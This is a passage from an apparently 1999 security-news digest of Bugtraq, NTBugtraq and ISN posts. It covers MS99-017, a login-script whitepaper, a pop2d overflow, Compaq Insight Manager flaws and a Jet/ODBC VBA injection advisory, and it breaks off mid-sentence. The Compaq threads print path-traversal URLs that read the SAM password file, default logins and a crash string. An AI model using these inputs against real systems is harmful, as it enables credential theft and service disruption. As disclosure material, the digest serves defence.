4qzL1pml8Ht2aKsJ+r6Ghf9cp2qOfCejigSWcHTfRLNhgoI2u1CL6G6ua3OkDBS8
5KVOeNhwDK0=
=GqTy
-----END PGP SIGNATURE-----
Regards,
David Kennedy CISSP
Director of Research Services, ICSA Inc. http://www.icsa.net
Using encryption on the Internet is the equivalent of arranging
an armored car to deliver credit-card information from someone
living in a cardboard box to someone living on a park bench.
Gene Spafford
----------------------------------------------------------------------------
Date: Fri, 28 May 1999 20:08:35 -0600 (MDT)
From: cult hero <jericho@dimensional.com>
To: InfoSec News <isn@repsec.com>
Subject: Re: [ISN] ICSA certifies weak crypto as secure
Reply From: edison <edison@dhp.com>
A few thoughts on the subject.
First, with the frightening amount of completely unsecured consumer info
sites on (and off) the net today, I would disagree that ICSA's actions
reflect "very badly" on our industry. Because there are much easier
targets, consumerinfo.com can be resonably certain that it won't even be
attacked for quite some time. At least until most of the rest of the
sites are secure in the same fashion.
Don't get me wrong, I'm not advocating 40-bit encryption as 'secure,' but
it is 'more secure' than nothing at all. And until the ingorant IT
managers with sites on the net clue in, this kind of certification won't
_hurt_ our industry. Please don't attack me - I'm just saying that while
we professionals might recognize weaknesses in this level of security,
those outside don't and "we" still look good to them.
Second, if you've every been to a hacker BBS/site, you have to know that
getting into Equifax or any other reporting agency is pitifully easy. If
you think 40-bit encryption is weak, how about a 2 character alphanumeric
"password" on accounts that can be pulled from your own credit report?
And for that matter, there are posted algorithms to the account scheme, so
you can even generate your own.
I will agree that there are more unsavory characters on the net than there
are people aware of CBI dialups. But then again, 40-bit crypto is not
exactly _easy_ to crack.
-edison
On Fri, 28 May 1999, cult hero wrote:
> I am becoming concerned about the apparent lack of professional competence
> within even well-known segments of the security community. I hope the
> incident I discovered is an isolated one, but even a single such incident
> is disquieting.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: OSAll [www.aviary-mag.com]
@HWA
48.0 RAS and RRAS vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Thu, 27 May 1999 17:18:25 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Alert: Microsoft Security Bulletin (MS99-017) - RAS & RRAS Passwords
On March 20th, Dieter Goepferich [dieter.goepferich@bigfoot.com]
discovered a vulnerability involving both RAS and RRAS. This was
subsequently reported in Heise Online, a German publication;
http://www.heise.de/newsticker/data/cp-12.04.99-000/
http://www.heise.de/newsticker/data/hos-15.04.99-000/
Dieter originally reported it via some "product improvement suggestion"
web form on www.microsoft.de back in March. Together we informed
Microsoft Security (secure@microsoft.com) back in April.
By default the registry key is only accessible to Administrator and the
user/owner of the passwords, but it represents a potential threat and a
location of password information which would not otherwise be expected.
See;
http://www.microsoft.com/security/bulletins/ms99-017.asp
for the complete write up including fix locations. There are two KB
articles about this (one for RAS, and another for RRAS). They were not
yet available at the time of writing.
RAS
http://support.microsoft.com/support/kb/articles/q230/6/81.asp
RRAS
http://support.microsoft.com/support/kb/articles/q233/3/03.asp
Cheers,
Russ - NTBugtraq Editor
-------------------------------------------------------------------------------
Date: Thu, 27 May 1999 15:14:46 -0700
From: aleph1@UNDERGROUND.ORG
To: BUGTRAQ@netspace.org
Subject: Microsoft Security Bulletin (MS99-017)
The following is a Security Bulletin from the Microsoft Product Security
Notification Service.
Please do not reply to this message, as it was sent from an unattended
mailbox.
********************************
Microsoft Security Bulletin (MS99-017)
--------------------------------------
Patch Available for "RAS and RRAS Password" Vulnerability
Originally Posted: May 27, 1999
Summary
=======
Microsoft has released a patch that eliminates a vulnerability in the
Microsoft (r) Windows NT (r) Remote Access Service (RAS) and Routing and
Remote Access Service (RRAS) clients, in which a user's password is cached
even if the user de-selects the "Save password" option.
Issue
=====
When the client software for Microsoft RAS or RRAS is used to dial into a
server, a dialogue requests the user's userid and password for the server.
On the same dialogue is a checkbox whose caption reads "Save password" and
which is intended to provide the user with the option to cache their
security credentials if desired. However, the implemented client
functionality actually caches the user's credentials regardless of whether
the checkbox is selected or de-selected.
Cached security credentials, which include the password, are stored in the
registry and protected by ACLs whose default values authorize only local
administrators and the user to access them. Windows NT 4.0 Service Pack 4
also provides the ability to strongly encrypts the password data stored in
the registry using the SYSKEY feature.
While there are no reports of customers being adversely affected by this
vulnerability, Microsoft is proactively releasing a patch that restores
correct functionality to the password caching function. The patch should be
applied to all machines that are used as RAS or RRAS clients. It is
important to note that RRAS servers also can be used as RRAS clients, and
any machines used in such a capacity should have the patch applied as well.
Affected Software Versions
==========================
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Server 4.0
- Microsoft Windows NT Server 4.0, Enterprise Edition
What Microsoft is Doing
=======================
Microsoft has released patches that fix the problem identified. The patches
are available for download from the sites listed below in What Customers
Should Do.
Microsoft also has sent this security bulletin to customers
subscribing to the Microsoft Product Security Notification Service.
See http://www.microsoft.com/security/services/bulletin.asp for
more information about this free customer service.
Microsoft has published the following Knowledge Base (KB) article on this
issue:
- Microsoft Knowledge Base (KB) article Q230681,
RAS Credentials Saved when "Save Password" Option Unchecked,
http://support.microsoft.com/support/kb/articles/q230/6/81.asp
- Microsoft Knowledge Base (KB) article Q233303,
RRAS Credentials Saved when "Save Password" Option Unchecked,
http://support.microsoft.com/support/kb/articles/q233/3/03.asp
(Note: It might take 24 hours from the original posting of this bulletin for
the KB article to be visible in the Web-based Knowledge Base.)
What Customers Should Do
========================
Microsoft highly recommends that customers evaluate the degree of risk that
this vulnerability poses to their systems and determine whether to download
and install the patch. The patch can be found at:
- RAS:
ftp://ftp.microsoft.com/bussys/winnt/winnt-public
/fixes/usa/nt40/Hotfixes-PostSP5/RASPassword-fix/
- RRAS:
ftp://ftp.microsoft.com/bussys/winnt/winnt-public
/fixes/usa/nt40/Hotfixes-PostSP5/RRASPassword-fix/
(Note: The URLs above have been wrapped for readability)
More Information
================
Please see the following references for more information related to this
issue.
- Microsoft Security Bulletin MS99-017,
Patch Available for "RAS and RRAS Password Caching"
Vulnerability, (The Web-posted version of this bulletin),
http://www.microsoft.com/security/bulletins/ms99-017.asp.
- Microsoft Knowledge Base (KB) article Q230681,
RAS Credentials Saved when "Save Password" Option Unchecked,
http://support.microsoft.com/support/kb/articles/q230/6/81.asp.
- Microsoft Knowledge Base (KB) article Q233303,
RRAS Credentials Saved when "Save Password" Option Unchecked,
http://support.microsoft.com/support/kb/articles/q233/3/03.asp
Obtaining Support on this Issue
===============================
If you require technical assistance with this issue, please
contact Microsoft Technical Support. For information on
contacting Microsoft Technical Support, please see
http://support.microsoft.com/support/contact/default.asp.
Revisions
=========
- May 27, 1999: Bulletin Created.
For additional security-related information about Microsoft products, please
visit http://www.microsoft.com/security
----------------------------------------------------------------------
THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,
EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR
LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE
FOREGOING LIMITATION MAY NOT APPLY.
(c) 1999 Microsoft Corporation. All rights reserved. Terms of Use.
*******************************************************************
You have received this e-mail bulletin as a result of your registration
to the Microsoft Product Security Notification Service. You may
unsubscribe from this e-mail notification service at any time by sending
an e-mail to MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM
The subject line and message body are not used in processing the request,
and can be anything you like.
For more information on the Microsoft Security Notification Service
please visit http://www.microsoft.com/security/bulletin.htm. For
security-related information about Microsoft products, please visit the
Microsoft Security Advisor web site at http://www.microsoft.com/security.
-------------------------------------------------------------------------------
Date: Fri, 28 May 1999 07:59:35 -0400
From: Russ <Russ.Cooper@RC.ON.CA>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: Alert: Microsoft Security
Bulletin (MS99-017) - RAS & RRAS Passwords
Wow, talk about goofing up.
Eric Schultze correctly pointed out that he, together with Lisa
O'Connor, Martin Dolphin, and Joe Greene reported this problem with RAS
originally way back on March 19th, 1998 <-- (note, 1998, not 1999). See
the original message at;
http://ntbugtraq.ntadvice.com/default.asp?pid=36&sid=1&A2=ind9803&L=ntbu
gtraq&F=P&S=&P=4209
(URL is wrapped).
I, most inappropriately, credited another with the discovery in March of
this year.
Its funny, when David LeBlanc first prompted me about this "discovery"
this year, I could have sworn I'd seen it before but I failed to check
my own archives...tsk tsk...;-]
So, to Lisa, Martin, Joe, and Eric, please accept my humble apologies!
To Microsoft, why the hell did it take a publication in a German
magazine to provoke you to fix something that had been reported here a
full year before?? Could it have been the fact that the 3/99 publication
included an exploit tool? Maybe we need to have an exploit coding group
at NTBugtraq that produces a tool for everything reported and
distributes said tool to all and sunder?
Cheers,
Russ - NTBugtraq Editor
@HWA
49.0 Whitepaper:The Unforseen Consequences of Login Scripts By Dan Kaminsky
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Seen via PacketStorm, scarfed from : http://doxpara.netpedia.net/login.html
Insecurity By Design:
The Unforseen Consequences of
Login Scripts
By Dan Kaminsky
A common aspect of most client-server network designs is the login script. A
set of commands executed upon provision of correct username and password,
the login script provides the means for corporate system administrators to
centrally manage their flock of clients. Unfortunately what´s seemingly good for
the business turns out to be a disastrous security hole in the University
environment, where students logging into the network from their dorm rooms
now find the network logging into them. This hole provides a single, uniform
point of access to any number of previously uncompromised clients, and is a
severe liability that must be dealt with with the highest urgency. Even those in the
corporate environment should take note of their uncomfortable exposure and
demand a number of security procedures described herein to protect their
networks. One possible solution for some may be the DoxPrint system designed
by this author; it allows users to print to Novell Print Queues over the Network
Neighborhood without requiring any Novell code on the client. Affected
universities should consider switching to systems that do not require full logins,
until more stable and secure systems are available.
What if I told you that every time you turned on your computer, the government
could control exactly what would load? What if, every time you entered your
username and password, your ISP gained the ability to specify exactly what
software should load, what files to send, maybe even what data to erase? What
if, merely by accessing a web page, your system came under the full control of
the page's author, or more accurately any possible author of that page,
authorized or not?
In each case, the security violation is quite obvious. Merely drawing electricity,
connecting to the Internet, or accessing a web page does not constitute an open
license to fully control a computer. In legal terms, each action by the user is an
ongoing communication under contractural obligations--for example, the user
agrees to pay a fee and provide authentication material in the form of username
and password, and in return the ISP agrees to provide Internet access. Never
does the user agree to a "remote root access contract"! Whether this access is,
in fact, used or abused is irrelevant. None of the user's actions constitutes
acceptance of "handing over the keys of the computer" to an external agent.
Of course, sometimes the issue of what, exactly, the term "user" means becomes
muddled. In a corporate environment, the user of the computing environment is
not necessarily its owner, nor is he or she the highest authority regarding what
should or shouldn't run on the machine. Login scripts, composed of lists of
commands to be executed on the client machines upon the correct provision of
username and password, provide a means for the central administrators of
corporate computers to automatically connect to network drives and printers.
They also allow the administrators to load any software they choose upon the
client computers as if the user himself had run it. Anything from Censorware to
remote control software is within the power of the administrator to load. This
freedom to centrally manage systems is extremely powerful. Some would argue
that it's an intrinsic capability of any client-server architecture that claims to be
"ready for the enterprise", as the prospect of physically handling each client
machine is extraordinarily expensive in terms of funds and manpower. With
every major client-server networking architecture automatically executing the
commands contained within login scripts *by default*, it would appear that
networking engineers are serving the perceived requirements of the corporate
mentality quite well.
Small problem: University dorm networks aren't corporate.
The authentication procedures built into Windows NT Domains and Novell
Netware are often used by Universities as a means for controlling access to file
and print resources. Both the University and the student are in an advanced
version of an Internet Service contract, but it's an ISP contract nonetheless. The
user(student) agrees to pay a fee(tuition) and provide authentication material in
the form of username and password, and in return the ISP(University) agrees to
provide access to network resources. Unfortunately, to provide access to file
and print resources, Windows(the predominate computing environment on the
desktop) cannot generally delay the login procedure until the time of actual
usage. Indeed, just as in the corporate world, the system is presumed to be the
property of the institution and the student/employee must thus authenticate him or
herself upon startup of the machine. Also, just as in the corporate world, the
system will by default execute any commands the system administrators have
deemed appropriate.
The school does not own the hardware, nor does it own the operating system
running upon it. Even if it did both, it would not own the data on those systems;
students do not generally relinquish ownership of their own labor to their
educational institution. It is of the highest inappropriateness, then, that University
Information Technology departments receive full access to that which is plainly
not theirs. It's not their faults, really. They just want to track use and prevent
abuse of pseudo-public resources. The only way to do this lies with the
corporate authentication mechanisms within Netware and NT Domains. That the
default setting in both environments is to load any login script provided is the fault
of their respective designers, not of the accidental victims in IT. Ironically, not a
bug but a long standing design decision is responsible for what is likely the
greatest single computer security vulnerability at many universities.
Saying that Login Scripts--something which, for so long, have been considered
as innocuous as an ugly background--are indeed such a powerfully damaging
technology is a strong statement that needs to be backed up. Login Scripts are
so dangerous because they eliminate the most effective element of the security
design behind Windows 95 and Windows 98: Security Through Impossibility.
By default, Windows runs almost no services. You can't telnet in, you can't view
the screen remotely, and there is no sendmail or ftp server with buffers to
overflow. The only common service run is the infamous NetBIOS. The result of
this restrictive environment is interesting: While it's not particularly difficult to
remotely crash a 95/98 machine, it's surprisingly hard to remotely compromise
this erstwhile insecure operating system without at least some interaction from the
user. It's the difference between a locked door and a brick wall.
Some arguably overzealous administrators will use this facet of security to ban
any and all services not explicitly authorized(by an Act of God, usually). This
can be excessive, and often prevents significant educational and productivity
benefits. It's not that services are necessarily worrisome so much as the universal
deployment of identically insecure services with significant value compromisable
by unauthorized access--dedicated servers, unfortunately, have a tendancy to fit
very nicely into this category. Sysadmins understand well that since both their
servers are at risk and downtime is expensive, it is necessary to have recent
backups of servers at all times. Sometimes, client desktops are also backed up.
But, in an educational institution, it is grossly improper for the university to have
copies of student/client data. Worse, as most computers ship with no
system-scale tape backup, very few students are able to back up their data.
This means that gigabytes of student data are protected only by the security built
into their operating system. This actually isn´t too awful--no default remote
access has its advantages--until the login scripts are compromised. Since the
login scripts reside on servers that in general are never considered fully secure by
nature of the services they run, and which are further targeted due to the high
value gained by a successful penetration, we see the heretofore impossible
compromisation of every single networked Windows station nearly
simultaneously as being only a matter of changing a few commands in a login
script. Crack one server, and you crack a thousand clients whose only "crime"
was stating their identity. That's one tough lesson.
Sadly, some university administrators have responded to this observed threat by
claiming that 1) they'd never maliciously enter anything into the login scripts and
2) they're pretty much the only ones with access to the login scripts, so "nothing
would ever happen." If there was ever a set of famous last words for a system
administrator, these would be them. They've got the keys to systems they don't
own, and it's probable that their users don't even know it. Their intentions are
irrelevant; they're not generally the ones to worry about. As I told one admin,
"It's not you I distrust. It's your computer. Maybe you'll accidentally share the
wrong directory. Maybe you´ll be forwarded to a web site that will use a
backdoor to initiate a remote LANMAN authentication. Perhaps a 95/98
machine you logged into as Administrator for the domain will have its .PWL files
cracked. Or maybe somebody will sneak in in the middle of the night and install
a keylogger. With one hack providing access to *everybody*'s machine, it's
worth it for a cracker to attack; isn't it worth it for you to defend?"
If this is making sysadmins in the corporate sector nervous...it should. Yes, the
downside to centralized management is indeed single point of massive failure.
More than ever, businesses are just one disgruntled system adminstrator away
from a task-scheduled mass virus infection--or worse. While indeed there are
methods for disabling the loading of login scripts, their all-or-nothing nature
makes them unrealistic in many environments. Businesses should not need to
choose between tremendous risk and necessary functionality. Microsoft and
Novell need to implement the following functionality in their login script code:
1) Script Capabiltiies. Login scripts allow drives to be mounted, printers to be
connected, applications to be loaded from remote drives, and so on. System
administrators need the ability to specify exactly which commands a client
machine should honor. This provides a barrier to abuse--a site that only uses
login scripts to mount network drives should be able to restrict clients to the
degree of functionality the site requires. There are going to be issues, of course,
with executable code on remote drives. To address this, we require...
2) Data Signatures. Cryptographic signatures on executable content, most
commonly used by Microsoft's Authenticode system, provide a means for
insecure systems to verify the appropriateness of remotely executed code.
Sysadmins should be able to "sign" login scripts, as well as commonly executed
remote code, and then specify that unless the client detects a signature from a
"trusted" list, the content should be considered unauthorized. Sysadmins should
also be able to sign actual executables(and maybe even data files) as acceptable
for remote execution.
3) Executable hash checking. A slightly different tact might be to have clients
cache hash values of specific files commonly run. Given a change from one
session to another in the file hash, a trap could be sent to the administrator noting
him or her that a system breach may have occurred. It´s one thing to replace the
contents of a file, but it´s another to have to operate against the memory of every
client that accessed the old file. This is a useful way to flip the disadvantage of
large numbers of dumb machines into an advantage of intelligent agents with
configurable responses to non-matching hashes.
Of course, the ultimate solution to this issue is to emulate a an alternate login
paradigm that Win95/98 implements to some degree. As Russ Cooper, editor
of NTBugTraq, writes:
There is *no need* for a client machine (be it Win9x or NT) to logon in to a domain in
a way that would invoke a login script in order to gain access to its resources. You
log into the machine itself (the client machine), and then connect to the resource
and supply a userID and password. This will establish the connection, without
invoking the login script. Bingo, problem solved, no?
Novell and many other systems need to emulate this usage paradigm post-haste,
and institutions still using full Domain logins must cease as soon as possible.
Universities should consider implementing systems that do not require any form
of login procedure for the user to access his or her own computer. The
reasoning for this is a matter of ownership--what right does a university have to
deny a user access to his or her own computer? Password security is
notoriously bad anyway, and is far too insecure for any degree of
non-repudiability. I´m working on a solution for switched hubs involving using
MAC Caches to allow trustable two-way communication traces.
Those who insist upon using login procedures need to be disable them
immediately for dorm-room computers. Students who need to connect to
specific shares should be given a batch script to load--this will, incidentally,
eliminate nasty situations where login scripts appropriate for one
environment(say, the capturing of LPT1 to a printer port) are completely
inappropriate in another(say, when that same user is in their dorm room).
For those administrators running Novell Netware all the way to your student´s
desktop, I implore you to evaluate DoxPrint. DoxPrint allows sysadmins to
enjoy most of the advantages of running Netware servers on the backend while
sparing Windows clients the hardship of installing and maintaining the Novell
client code. All access occurs over the Network Neighborhood, and is quite
flexible in its programmability and authentication. It´s been tested and proven as
a powerful solution to some of the problems Netware creates.
It´s a strange thing, that such a common function would turn out so open for
abuse. System designers who create new functionality need to include security
considerations at every phase of the design process. Any time network access
to a system is introduced, there is a significant burden of functionality upon
the system to verify that the actions executed on behalf of the remote agent
are appropriate. Failure to meet this burden is technical irresponsibility and
must be prevented at all costs.
I am immensely curious as to the reactions of Microsoft, Novell, and any other
administrator who is reading this now. Please, send me your opinions; I´ll
publish the best of the replies.
@HWA
50.0 Vulnerability in pop2.imap
~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 26 May 1999 20:37:13 +0100
From: Chris Evans <chris@FERRET.LMH.OX.AC.UK>
To: BUGTRAQ@netspace.org
Subject: Remote vulnerability in pop2d
Hi
Firstly, sorry if any details are hazy - this is from memory (it's two
months since I last looked at this). This bug concerns the pop-2 daemon,
which is a part of the Washington University imap package.
I've been waiting for a CERT advisory, but one doesn't seem to be
forthcoming. Two and a half months is a long time. Also, the problem has
been fixed for a long time. I'm posting because
a) A fixed full release is available, so people should know about it
b) The flaw is fairly basic and easy to spot, so active exploitation could
well be happening
Quick details
=============
Compromise possible: remote users can get a shell as user "nobody"
If: runing pop-2d v4.4 or earlier
Fixed version: imap-4.5, available now.
Not vulnerable
==============
RedHat-6.0 isn't vulnerable because imap-4.5 was shipped.
Vulnerable
==========
Anyone who shipped the pop-2 component of imap-4.4 or earlier, including
earlier RedHat releases
Details of flaw
===============
pop-2 and pop-3 support the concept of an "anonymous proxy" whereby remote
users can connect and open an imap mailbox on _any server they have a
valid account on_. An attacker connects to the vulnerable pop-2 port and
connects it to an imap server under their control. Once logged on, issuing
a "FOLD" command with a long arg will cause an overflow of a stack based
buffer.
The arg to FOLD must be somewhere around 1000 bytes - not much bigger, not
much smaller. Look at the source.
Additional
==========
I think the concept of "anonymous proxy" is just fundamentally insecure.
It opens up a large code path for remote usrs to explore, i.e. the
protocol parsing of imap, etc.
The author of imap very responsibly includes a compile time flag to
disable this in 4.5.
Better still, RedHat-6.0 ships with the proxy disabled.
Cheers
Chris
@HWA
51.0 Infosec.19990526.compaq-im.a 'Compaq insight manager vulnerability'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 26 May 1999 16:41:36 +0100
From: gabriel.sandberg@INFOSEC.SE
To: BUGTRAQ@netspace.org
Subject: Infosec.19990526.compaq-im.a
Infosec Security Vulnerability Report
No: Infosec.19990526.compaq-im.a
=====================================
Vulnerability Summary
---------------------
Problem: The web server included in Compaq Insight
Manager could expose sensitive information.
Threat: Anyone that have access to port 2301 where
Compaq Insight Manager is installed could get
unrestricted access to the servers disk through
the "root dot dot" bug.
Platform: Detected on Windows NT and Novell Netware servers
running on Compaq hardware.
Solution: Disable the Compaq Insight Manager web server or
restrict anonymous access.
Vulnerability Description
-------------------------
When installing Compaq Insight Manager a web server gets installed. This web
server runs on port 2301 and is vulnerable to the old "root dot dot" bug. This
bug gives unrestricted access to the vulnerable server?s disk. It could easily
get exploited with one of the URLs:
http://vulnerable-NT.com:2301/../../../winnt/repair/sam._
http://vulnerable-Netware.com:2301/../../../system/ldremote.ncf
(How many dots there should be is install-dependent)
Solution
--------
You could probably fix the problem by restricting anonymous access to the Compaq
Insight Manager web server. If you are not using the web server, Infosec
recommends disabling the service.
Background
----------
Infosec gives the credits to Master Dogen who first reported the problem
(Windows NT and Compaq Insight Manager) to us and wanted us go public with a
vulnerability report.
Infosec have found that Novell Netware with Compaq Insight Manager have the same
problem but is not as common as on Windows NT.
Compaq Sweden was informed about this problem april 26, 1999.
//Gabriel Sandberg, Infosec
gabriel.sandberg@infosec.se
------------------------------------------------------------------------------
Date: Wed, 26 May 1999 16:13:19 -0500
From: Vacuum <vacuum@SWORD.DAMOCLES.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Infosec.19990526.compaq-im.a
Please disgregard previous post, the signature got in the way of a paste
In addition to //Gabriel Sandberg, Infosec gabriel.sandberg@infosec.se's
findings.
Web-Based Management is enabled, by default, when you install the Compaq
Server Management Agents for Windows NT.(CPQWMGMT.EXE) The web-enabled
Compaq Server Management Agents allow you to view subsystem and status
information from a web browser, either locally or remotely. Web-enabled
Service Management Agents are availible in all 4.x versions of Insight
Manager.
Compaq HTTP Server Version 1.2.15 (Pre-Release)
The only user accounts available in the Compaq Server Management
Agent WEBEM release are listed below.
http://111.111.111.111:2301/cpqlogin.htm
account anonymous
username anonymous
password
account user
username user
password public
account operator
username operator
password operator
account administrator
username administrator
password administrator
http://111.111.111.111:2301/cpqlogin.htm?ChangePassword=yes
is the url used to change the password. Unfortunately the password is
the only information that can be changed and is stored in
clear text in the following file.
c:\compaq\wbem\cpqhmmd.acl
-------------------------------------------------------------------------------------
Compaq-WBEM-AclFile, 1.1
anonymous anonymous 737EEEFA7617ED94EDD74E659B83035F
login in progress... login in progress...
7A21DD9917C0C23907267FC07DBC7D12
administrator administrator D6022D9B3FCA717CCEED36E640160478
51B02137D6BF719FC62F4940DBE1F3E6
operator operator B5CE548356D1BEA5F1CFEE12FE9502C3
041D1015AEC9F60412C7F86E62D6672C
user user
EC286E733A8892ADFC895611D1557557 C865DE636CA398F8523EDBE5700D457A
Once you have found one wbem enabled machine, using compaq's HTTP
Auto-Discovery Device List http://111.111.111.111:2301/cpqdev.htm
It is trivial to locate other machines.
------------------------------------------------------------------------------
Date: Thu, 27 May 1999 21:43:09 -0500
From: Vacuum <vacuum@SWORD.DAMOCLES.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Infosec.19990526.compaq-im.a (New DoS and correction to my previous post)
Upon further research, I must retract my earlier statement that the
Compaq Insight Manager Web Agent's passwords are stored in clear text.
Infact, what we see in cpqhmmd.acl are the account name and username in
clear text NOT the password.
Explanation of username and password combinations mentioned in my previous
post.
c:\compaq\wbem\cpqhmmd.acl
or
http://111.111.111.111:2301/../../../compaq/wbem/cpqhmmd.acl
cpqhmmd.acl contents:
Compaq-WBEM-AclFile, 1.1
anonymousanonymous737EEEFA7617ED94EDD74E659B83035F
login in progress...login in progress...7A21DD9917C0C23907267FC07DBC7D12
administratoradministrator37741E7AC5B9871F87CE6ABE15B28FCB070293B3998C461D866E277A259619F0
operatoroperatorB5CE548356D1BEA5F1CFEE12FE9502C3041D1015AEC9F60412C7F86E62D6672C
useruserEC286E733A8892ADFC895611D1557557C865DE636CA398F8523EDBE5700D457A
The default usernames and password combinations that I mentioned in my
previous
post are still valid.
Once again these are the defaults: account: anonymous username: anonymous
password:
account: user username: user password: public
account: operator username: operator password: operator
account: administrator username: administrator password: administrator
There are three types of data:
Default(read only), Sets(read/write), and Reboot(read/write).
The WebAgent.ini file in the system_root\CpqMgmt\WebAgent directory
specifies the level
of user that has access to data . The "read=" and "write=" entries in the
file set the
user accounts required for access, where: 0 = No access, 1 = Anonymous, 2
= User,
3 = Operator, and 4 = Administrator.
Changing these entries changes the security. The web-enabled Server Agent
service must
be stopped and restarted for any changes to take effect. Do not modify
anything except
the read/write levels.
New Denial of service:
Just to make this post somewhat worthwile.
http://111.111.111.111:2301/AAAAAAAA..... (223 A's seemed to be the
minimum)
The first time this occurs, an application error occurs in surveyor.exe
Exception: access violation (0xc0000005), Address: 0x100333e5
If you restart the Insight Web Agent Service and repeat it
will cause an application error in cpqwmget.exe
Exception: access violation(0xc0000005), Address 0x002486d4
The http://111.111.111.111 will no longer respond until the service is
stopped and restarted.
Apologies for my previous error.
vac
------------------------------------------------------------------------------
Date: Fri, 28 May 1999 08:54:10 -0400
From: Ricky Mitchell <rjmitchell@COLUMBIAENERGYGROUP.COM>
To: BUGTRAQ@netspace.org
Subject: second compaq insight manager vulnerablilty
Greetings,
Yesterday while I was removing the "web insight agent" service from the our
vulnerable NT servers, I noticed on some machines that port 2301 was still
vulnerable. To completely remove the problem, make sure you also stop the
"surveryor" service as well if you have that installed. That will
completely shut off access to port 2301 and plug the hole.
Regards,
Rick Mitchell
NT administrator
Columbia Gas Transmission Corp
@HWA
52.0 Advisory: NT ODBC Remote Compromise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Tue, 25 May 1999 13:59:30 -0500
From: .rain.forest.puppy. <rfp@WIRETRIP.NET>
To: BUGTRAQ@netspace.org
Subject: Advisory: NT ODBC Remote Compromise
--[ Advisory: NT ODBC Remote Compromise
--[ By Matthew Astley [RCPS] http://www.fruitcake.demon.co.uk
--[ & Rain Forest Puppy [WireTrip] rfp@wiretrip.net
--[ Brief Summary
MS Jet database engine (which runs Access databases) allows an individual
to embed VBA in string expressions, which may allow the individual to run
commandline NT commands. This, combined with the flaw of IIS running ODBC
commands as system_local allow a remote attacker to have full control of
the system. Other webservers may be affected. Many MS Jet engines are
affected, but may not lead to elevated priviledges.
--[ Background
ODBC allows a program flexible access to one or more relational databases
using SQL. If a client fails to quote correctly the meta characters in a
piece of data used in an SQL query, an attacker may be able to interfere
with the tables in the database (see MS SQL appension 'feature' in Phrack
54, article 8).
However, the Microsoft "Jet" database engine (aka MS Access) provides some
extensions to SQL which allow the execution of VBA (Visual Basic for
Applications). This makes holes in meta character quoting code much more
interesting and dangerous.
--[ What form does the hole take?
In SQL, strings must be enclosed in single quotes. If a string includes a
single quote it must be escaped by doubling it up.
The Jet engine extends this by allowing strings to enclose a VBA
expression inside vertical bar characters in the string, like this:
select 'lil'' string | 6+7 | with number' as foo from table;
This will produce a recordset containing one field with the value "lil'
string 13 with number" for each row of the input table. Innocent enough,
if the CGI or ASP programs correctly quote the incoming data.
However, since the pipe operator is a rather obscure character and is very
poorly documented, most people don't know it's there - apparently even
Microsoft programmers.
--[ It's a feature, not a bug!
Note the following excerpt from a MS Knowledge Base article:
(http://support.microsoft.com/support/kb/articles/q147/6/87.asp)
Pipe Character or Vertical Bar
The pipe character or vertical bar is a reserved character for the Jet
database engine. It tells the Jet database engine to evaluate the
identifier before evaluating the rest of the expression. Therefore, the
Jet database engine inserts the value of the identifier in the expression,
and then evaluates it.
Vertical bars are used most often in domain aggregate functions when you
want the function to automatically recalculate the value it returns in
filters. Or vertical bars are used as an alternative to the ampersand (&)
operator when you concatenate text values. Because of this, you cannot
embed the vertical bar (|) in a literal string, you must embed the Chr()
function. Chr(124) is the vertical bar.
--[ Where does it apply?
Any textual data included in a Jet SQL query can contain quoted VBA,
whether it is in data to be inserted in a new record or part of a
condition expression. This makes the hole very general (or flexible, if
you prefer), since you don't need to know the context in which the string
will be evaluated.
--[ What commands are available?
The biggest restriction is that the code must be evaluated in an
expression context - no statements.
Anything listed as "VBA" in the "Functions Reference" page of the Access
Help file will work, although this seems to vary between versions of the
Jet engine - for example, in some cases the "eval" function works and in
others it doesn't (although when it is available, eval doesn't actually
help much because the |...| operator offers a similar if not identical
context).
The most useful command is "shell", although this in itself cannot do
redirections or pipes - cmd.exe can assist with this though. By using the
shell function and running cmd.exe, an attacker can run any command on the
system.
environ() can also be useful to get environment variables values into your
commands, and chr() can be very handy for quoting awkward characters using
alphanumerics and brackets. There are also the standard functions like
iif() and various string operations (use "&" for concatenation).
It would be very difficult to include any kind of loop in the VBA fragment
because loops do not have return values.
--[ Which characters need quoting, and how?
If the exploit string will be passing through anything that tries to
escape special characters then ' will be double up - best to use "
instead.
Ironically, the vertical bar character can only be escaped by using it to
evaluate the chr(124) function.
VBA will take pairs of double-quotes (") in a VBA string constant the same
way SQL will take pairs of single-quotes. If this doesn't seem to work you
can always use chr(34).
ASP also provides a convenient debugging aid - if the expression cannot be
correctly evaluated the error message will often include the whole SQL
query with the partially decoded exploit string in it--this could help an
attacker 'tweak' the exploit string until it works.
If the command needs to be broken up with newlines, they can be inserted
